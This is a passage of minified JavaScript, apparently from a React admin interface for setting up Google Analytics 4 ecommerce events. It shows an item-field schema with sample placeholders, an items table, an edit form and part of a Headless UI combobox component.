Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},add_to_cart:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},add_to_wishlist:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},begin_checkout:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},purchase:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},refund:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},remove_from_cart:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},select_item:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},select_promotion:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},creative_name:{type:"text",required:!1,placeholder:"summer_banner2"},creative_slot:{type:"text",required:!1,placeholder:"featured_app_1"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},promotion_id:{type:"text",required:!1,placeholder:"P_12345"},promotion_name:{type:"text",required:!1,placeholder:"Summer Sale"},quantity:{type:"number",required:!1,placeholder:"1"}},view_cart:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},view_item:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},view_item_list:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},view_promotion:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},creative_name:{type:"text",required:!1,placeholder:"summer_banner2"},creative_slot:{type:"text",required:!1,placeholder:"featured_app_1"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},promotion_id:{type:"text",required:!1,placeholder:"P_12345"},promotion_name:{type:"text",required:!1,placeholder:"Summer Sale"},quantity:{type:"number",required:!1,placeholder:"1"}}},Ba=t=>{let{eventName:a,currentItem:i,setCurrentItem:n,index:u,saveItem:s}=t;const{openItemsForm:l,setOpenItemsForm:o}=(0,r.useContext)(Qa);function c(e,t){let r={...i};r[e]=t,n(r)}return(0,e.createElement)(vt.Root,{show:l,as:r.Fragment},(0,e.createElement)(Ua,{as:"div",className:"relative z-[9999991]",onClose:o},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"ease-in-out duration-500",enterFrom:"opacity-0",enterTo:"opacity-100",leave:"ease-in-out duration-500",leaveFrom:"opacity-100",leaveTo:"opacity-0"},(0,e.createElement)("div",{className:"fixed inset-0 bg-gray-500 bg-opacity-50 transition-opacity"})),(0,e.createElement)("div",{className:"fixed inset-0"}),(0,e.createElement)("div",{className:"fixed inset-0 overflow-hidden"},(0,e.createElement)("div",{className:"absolute inset-0 overflow-hidden"},(0,e.createElement)("div",{className:"pointer-events-none fixed inset-y-0 right-0 flex w-1/4 min-w-[700px] pl-10"},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"transform transition ease-in-out duration-500 sm:duration-700",enterFrom:"translate-x-full",enterTo:"translate-x-0",leave:"transform transition ease-in-out duration-500 sm:duration-700",leaveFrom:"translate-x-0",leaveTo:"translate-x-full"},(0,e.createElement)(Ua.Panel,{className:"pointer-events-auto w-screen flex-1 "},(0,e.createElement)("form",{id:"item-form",onSubmit:function(e){e.preventDefault(),s(i,u),n({}),o(!1)},className:"flex h-full flex-col divide-y divide-gray-200 bg-white shadow-xl"},(0,e.createElement)("div",{"data-component":"form-wrapper",className:"flex min-h-0 flex-1 flex-col"},(0,e.createElement)("header",{className:"py-5 pl-10 pr-10 sticky top-0 shadow backdrop-filter backdrop-blur-lg backdrop-saturate-110 bg-opacity-80"},(0,e.createElement)("div",{className:"flex items-start justify-between"},(0,e.createElement)(Ua.Title,{className:"text-2xl font-medium text-gray-900"}," ",u>=0?"Edit":"New"," Item "),(0,e.createElement)("div",{className:"ml-3 flex h-7 items-center"},(0,e.createElement)("button",{type:"button",className:"rounded-md bg-white text-gray-400 hover:text-gray-500 focus:outline-none focus:ring-2 focus:ring-indigo-500",onClick:()=>o(!1)},(0,e.createElement)("span",{className:"sr-only"},"Close panel"),(0,e.createElement)(At,{className:"h-6 w-6","aria-hidden":"true"}))))),(0,e.createElement)("div",{"data-component":"main-form",className:"overflow-y-scroll bg-gray-100 p-10"},(0,e.createElement)("div",{"data-component":"inline-form",className:"bg-white w-full p-10 rounded-md"},(0,e.createElement)("div",{"data-component":"fieldset-wrapper",className:"sm:mt-5 space-y-6 sm:space-y-5"},Object.entries(qa[a]).map((t=>{let[r,a]=t;return(0,e.createElement)(_a,{key:r,pKey:r,pValue:i[r],required:a.required,type:a.type,placeholder:a.placeholder,setItem:c})})))))),(0,e.createElement)("footer",{className:"flex flex-shrink-0 justify-end px-4 py-4"},(0,e.createElement)("button",{type:"button",className:"rounded-md border border-gray-300 bg-white py-2 px-4 text-sm font-medium text-gray-700 shadow-sm hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2",onClick:()=>o(!1)},"Cancel"),(0,e.createElement)("button",{type:"submit",form:"item-form",className:"ml-4 inline-flex justify-center rounded-md border border-transparent bg-indigo-600 py-2 px-4 text-sm font-medium text-white shadow-sm hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2"},"Save"))))))))))};function Za(){for(var e=arguments.length,t=new Array(e),r=0;r<e;r++)t[r]=arguments[r];return t.filter(Boolean).join(" ")}function Wa(t){let{eventName:a,eventItems:i,updateFunction:n}=t;(0,r.useRef)();const[u,s]=(0,r.useState)(Array.isArray(i)?i:[]),[l,o]=(0,r.useState)(!1),[c,L]=(0,r.useState)(!1),[M,d]=(0,r.useState)([]),{openItemsForm:j,setOpenItemsForm:m}=(0,r.useContext)(Qa),[N,y]=(0,r.useState)(),[p,g]=(0,r.useState)(!1),[x,w]=(0,r.useState)({}),[T,E]=(0,r.useState)(),[S,D]=(0,r.useState)(!1);return(0,r.useEffect)((()=>{n(u)}),[u]),(0,e.createElement)("div",{"data-component":"items-table",className:"flex flex-col bg-gray-50 rounded-50"},(0,e.createElement)("header",{className:"p-4 sm:flex sm:items-center"},(0,e.createElement)("div",{className:"sm:flex-auto"},(0,e.createElement)("h3",{className:"uppercase text-base leading-6 font-medium text-gray-900"},"Items")),(0,e.createElement)("div",{className:"mt-4 sm:mt-0 sm:ml-16 sm:flex-none"},(0,e.createElement)("button",{onClick:function(){w({}),E(-1),m(!0)},type:"button",className:"capitalize inline-flex items-center justify-center rounded-md border border-transparent bg-brand-primary px-4 py-2 text-sm font-medium text-white shadow-sm hover:bg-brand-primary-hover focus:outline-none focus:ring-2 focus:ring-brand-primary-focus focus:ring-offset-2 sm:w-auto"},"Add Item"))),(0,e.createElement)("div",{"data-component":"item-list",className:"bg-gray-100 p-2 flex items-center"},u&&u.length>0?(0,e.createElement)("table",{className:"min-w-full table-fixed divide-y divide-gray-300"},(0,e.createElement)("thead",{className:"bg-gray-50"},(0,e.createElement)("tr",null,(0,e.createElement)("th",{scope:"col",className:"min-w-[12rem] py-3.5 pr-2 pl-4 text-left text-sm font-semibold text-gray-900"},"Item ID"),(0,e.createElement)("th",{scope:"col",className:"px-3 py-3.5 text-left text-sm font-semibold text-gray-900"},"Item Name"),(0,e.createElement)("th",{scope:"col",className:"px-3 py-3.5 text-left text-sm font-semibold text-gray-900"}),(0,e.createElement)("th",{scope:"col",className:"relative py-3.5 pl-3 pr-4 sm:pr-6"},(0,e.createElement)("span",{className:"sr-only"},"Edit")))),(0,e.createElement)("tbody",{className:" bg-white"},u&&u.length>0&&u[0]?u.map(((t,a)=>(0,e.createElement)(r.Fragment,{key:a},(0,e.createElement)("tr",{className:"bg-gray-50"},(0,e.createElement)("td",{className:Za("whitespace-nowrap pr-2 pl-4 text-sm font-medium","py-1","pt-2",M.includes(t)?"text-gtIndigo-600":"text-gray-900")},t.item_id),(0,e.createElement)("td",{rowSpan:"2",className:"whitespace-nowrap px-3 text-sm text-gray-500"},t.item_name),(0,e.createElement)("td",{rowSpan:"2",className:"whitespace-nowrap px-3 text-sm text-gray-500"}),(0,e.createElement)("td",{rowSpan:"2",className:"whitespace-nowrap  py-6 pl-3 pr-4 text-right text-sm font-medium sm:pr-6"},(0,e.createElement)("button",{type:"button",onClick:e=>function(e,t,r){e.preventDefault();let a={...t};w(a),E(r),m(!j)}(e,t,a),className:"inline-flex items-center px-2.5 py-1.5 border border-transparent text-xs font-medium rounded shadow-sm text-white bg-brand-primary hover:bg-brand-primary-hover focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-brand-primary-focus"},"Edit"),(0,e.createElement)("button",{type:"button",onClick:e=>function(e,t,r){e.preventDefault();let a={...t};a.index=r,w(a),g(!0)}(e,t,a),className:"ml-3 inline-flex items-center px-2.5 py-1.5 border border-transparent text-xs font-medium rounded shadow-sm text-white bg-brand-danger hover:bg-brand-danger-hover focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-brand-primary-focus"},"Delete")))))):null)):(0,e.createElement)("div",{"data-component":"no-items-placeholder",className:"p-6 flex-1 text-center items-center opacity-90 bg-gray-200 rounded my-4"},"No Items"),(0,e.createElement)(Ba,{eventName:a,currentItem:x,setCurrentItem:w,index:T,saveItem:(e,t)=>{if(t>=0){let r=u;r[t]=e,s([...r])}else s([...u,e])}})),p&&(0,e.createElement)(Fa,{open:p,toggleDeleteModal:function(){g(!p)},index:x.index,item_id:x.item_id,currentItemId:x.item_id,deleteItem:e=>{let t=u;t.splice(e,1),s(t),w(!1)},updateFunction:n}))}function Ha(t){let{pKey:r,pValue:a,setProp:i,required:n,type:u,placeholder:s,deleteProp:l,deleteButton:o}=t;return(0,e.createElement)(e.Fragment,null,"items"!=r?(0,e.createElement)("tr",{className:"bg-gray-50"},(0,e.createElement)("td",{className:"whitespace-nowrap pr-2 pl-4 text-sm font-medium py-1  pt-2 text-gray-900"},r),(0,e.createElement)("td",{className:"whitespace-nowrap px-3 text-sm text-gray-500"},(0,e.createElement)("input",{type:u,required:n,name:r,placeholder:s,id:r,value:a,onChange:e=>i(r,"items"==r?"[{}]":e.target.value),className:"flex-1 block col-span-2 w-full focus:ring-indigo-500 focus:border-indigo-500 min-w-0 rounded-none rounded-r-md sm:text-sm border-gray-300"})),(0,e.createElement)("td",{className:"whitespace-nowrap px-3 text-sm text-gray-500"}),(0,e.createElement)("td",{className:"whitespace-nowrap  py-6 pl-3 pr-4 text-right text-sm font-medium sm:pr-6"},(0,e.createElement)("button",{type:"button",onClick:e=>l(r),className:"ml-3 inline-flex items-center px-2.5 py-1.5 border border-transparent text-xs font-medium rounded shadow-sm text-white bg-brand-danger hover:bg-brand-danger-hover focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-brand-danger-focus"},"Delete"))):"")}function Va(e,t){let[a,i]=(0,r.useState)(e),n=lt(e);return ut((()=>i(n.current)),[n,i,...t]),a}function Ja(e){var t;if(e.type)return e.type;let r=null!=(t=e.as)?t:"button";return"string"==typeof r&&"button"===r.toLowerCase()?"button":void 0}function Xa(e,t){let[a,i]=(0,r.useState)((()=>Ja(e)));return ut((()=>{i(Ja(e))}),[e.type,e.as]),ut((()=>{a||t.current&&t.current instanceof HTMLButtonElement&&!t.current.hasAttribute("type")&&i("button")}),[a,t]),a}var Ka=(e=>(e[e.First=0]="First",e[e.Previous=1]="Previous",e[e.Next=2]="Next",e[e.Last=3]="Last",e[e.Specific=4]="Specific",e[e.Nothing=5]="Nothing",e))(Ka||{});function $a(e={},t=null,r=[]){for(let[a,i]of Object.entries(e))ti(r,ei(t,a),i);return r}function ei(e,t){return e?e+"["+t+"]":t}function ti(e,t,r){if(Array.isArray(r))for(let[a,i]of r.entries())ti(e,ei(t,a.toString()),i);else r instanceof Date?e.push([t,r.toISOString()]):"boolean"==typeof r?e.push([t,r?"1":"0"]):"string"==typeof r?e.push([t,r]):"number"==typeof r?e.push([t,`${r}`]):null==r?e.push([t,""]):$a(r,t,e)}function ri(e,t,a){let[i,n]=(0,r.useState)(a),u=void 0!==e,s=(0,r.useRef)(u),l=(0,r.useRef)(!1),o=(0,r.useRef)(!1);return!u||s.current||l.current?!u&&s.current&&!o.current&&(o.current=!0,s.current=u,console.error("A component is changing from controlled to uncontrolled. This may be caused by the value changing from a defined value to undefined, which should not happen.")):(l.current=!0,s.current=u,console.error("A component is changing from uncontrolled to controlled. This may be caused by the value changing from undefined to a defined value, which should not happen.")),[u?e:i,ct((e=>(u||n(e),null==t?void 0:t(e))))]}function ai(e){return[e.screenX,e.screenY]}var ii=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(ii||{}),ni=(e=>(e[e.Single=0]="Single",e[e.Multi=1]="Multi",e))(ni||{}),ui=(e=>(e[e.Pointer=0]="Pointer",e[e.Other=1]="Other",e))(ui||{}),si=(e=>(e[e.OpenCombobox=0]="OpenCombobox",e[e.CloseCombobox=1]="CloseCombobox",e[e.GoToOption=2]="GoToOption",e[e.RegisterOption=3]="RegisterOption",e[e.UnregisterOption=4]="UnregisterOption",e[e.RegisterLabel=5]="RegisterLabel",e))(si||{});function li(e,t=(e=>e)){let r=null!==e.activeOptionIndex?e.options[e.activeOptionIndex]:null,a=br(t(e.options.slice()),(e=>e.dataRef.current.domRef.current)),i=r?a.indexOf(r):null;return-1===i&&(i=null),{options:a,activeOptionIndex:i}}let oi={1(e){var t;return null!=(t=e.dataRef.current)&&t.disabled||1===e.comboboxState?e:{...e,activeOptionIndex:null,comboboxState:1}},0(e){var t;if(null!=(t=e.dataRef.current)&&t.disabled||0===e.comboboxState)return e;let r=e.activeOptionIndex;if(e.dataRef.current){let{isSelected:t}=e.dataRef.current,a=e.options.findIndex((e=>t(e.dataRef.current.value)));-1!==a&&(r=a)}return{...e,comboboxState:0,activeOptionIndex:r}},2(e,t){var r,a,i,n;if(null!=(r=e.dataRef.current)&&r.disabled||null!=(a=e.dataRef.current)&&a.optionsRef.current&&(null==(i=e.dataRef.current)||!i.optionsPropsRef.current.static)&&1===e.comboboxState)return e;let u=li(e);if(null===u.activeOptionIndex){let e=u.options.findIndex((e=>!e.dataRef.current.disabled));-1!==e&&(u.activeOptionIndex=e)}let s=function(e,t){let r=t.resolveItems();if(r.length<=0)return null;let a=t.resolveActiveIndex(),i=null!=a?a:-1,n=(()=>{switch(e.focus){case 0:return r.findIndex((e=>!t.resolveDisabled(e)));case 1:{let e=r.slice().reverse().findIndex(((e,r,a)=>!(-1!==i&&a.length-r-1>=i||t.resolveDisabled(e))));return-1===e?e:r.length-1-e}case 2:return r.findIndex(((e,r)=>!(r<=i||t.resolveDisabled(e))));case 3:{let e=r.slice().reverse().findIndex((e=>!t.resolveDisabled(e)));return-1===e?e:r.length-1-e}case 4:return r.findIndex((r=>t.resolveId(r)===e.id));case 5:return null;default:!function(e){throw new Error("Unexpected object: "+e)}(e)}})();return-1===n?a:n}(t,{resolveItems:()=>u.options,resolveActiveIndex:()=>u.activeOptionIndex,resolveId:e=>e.id,resolveDisabled:e=>e.dataRef.current.disabled});return{...e,...u,activeOptionIndex:s,activationTrigger:null!=(n=t.trigger)?n:1}},3:(e,t)=>{var r,a;let i={id:t.id,dataRef:t.dataRef},n=li(e,(e=>[...e,i]));null===e.activeOptionIndex&&null!=(r=e.dataRef.current)&&r.isSelected(t.dataRef.current.value)&&(n.activeOptionIndex=n.options.indexOf(i));let u={...e,...n,activationTrigger:1};return null!=(a=e.dataRef.current)&&a.__demoMode&&void 0===e.dataRef.current.value&&(u.activeOptionIndex=0),u},4:(e,t)=>{let r=li(e,(e=>{let r=e.findIndex((e=>e.id===t.id));return-1!==r&&e.splice(r,1),e}));return{...e,...r,activationTrigger:1}},5:(e,t)=>({...e,labelId:t.id})},ci=(0,r.createContext)(null);function Li(e){let t=(0,r.useContext)(ci);if(null===t){let t=new Error(`<${e} /> is missing a parent <Combobox /> component.`);throw Error.captureStackTrace&&Error.captureStackTrace(t,Li),t}return t}ci.displayName="ComboboxActionsContext";let Mi=(0,r.createContext)(null);function di(e){let t=(0,r.useContext)(Mi);if(null===t){let t=new Error(`<${e} /> is missing a parent <Combobox /> component.`);throw Error.captureStackTrace&&Error.captureStackTrace(t,di),t}return t}function ji(e,t){return qe(t.type,oi,e,t)}Mi.displayName="ComboboxDataContext";let mi=r.Fragment,Ni=Be.RenderStrategy|Be.Static,yi=Je((function(e,t){let{value:a,defaultValue:i,onChange:n,name:u,by:s=((e,t)=>e===t),disabled:l=!1,__demoMode:o=!1,nullable:c=!1,multiple:L=!1,...M}=e,[d=(L?[]:void 0),j]=ri(a,n,i),[m,N]=(0,r.useReducer)(ji,{dataRef:(0,r.createRef)(),comboboxState:o?0:1,options:[],activeOptionIndex:null,activationTrigger:1,labelId:null}),y=(0,r.useRef)(!1),p=(0,r.useRef)({static:!1,hold:!1}),g=(0,r.useRef)(null),x=(0,r.useRef)(null),w=(0,r.useRef)(null),T=(0,r.useRef)(null),E=ct("string"==typeof s?(e,t)=>{let r=s;return(null==e?void 0:e[r])===(null==t?void 0:t[r])}:s),S=(0,r.useCallback)((e=>qe(D.mode,{1:()=>d.some((t=>E(t,e))),0:()=>E(d,e)})),[d]),D=(0,r.useMemo)((()=>({...m,optionsPropsRef:p,labelRef:g,inputRef:x,buttonRef:w,optionsRef:T,value:d,defaultValue:i,disabled:l,mode:L?1:0,get activeOptionIndex(){if(y.current&&null===m.activeOptionIndex&&m.options.length>0){let e=m.options.findIndex((e=>!e.dataRef.current.disabled));if(-1!==e)return e}return m.activeOptionIndex},compare:E,isSelected:S,nullable:c,__demoMode:o})),[d,i,l,L,c,o,m]),f=(0,r.useRef)(null!==D.activeOptionIndex?D.options[D.activeOptionIndex]:null);(0,r.useEffect)((()=>{let 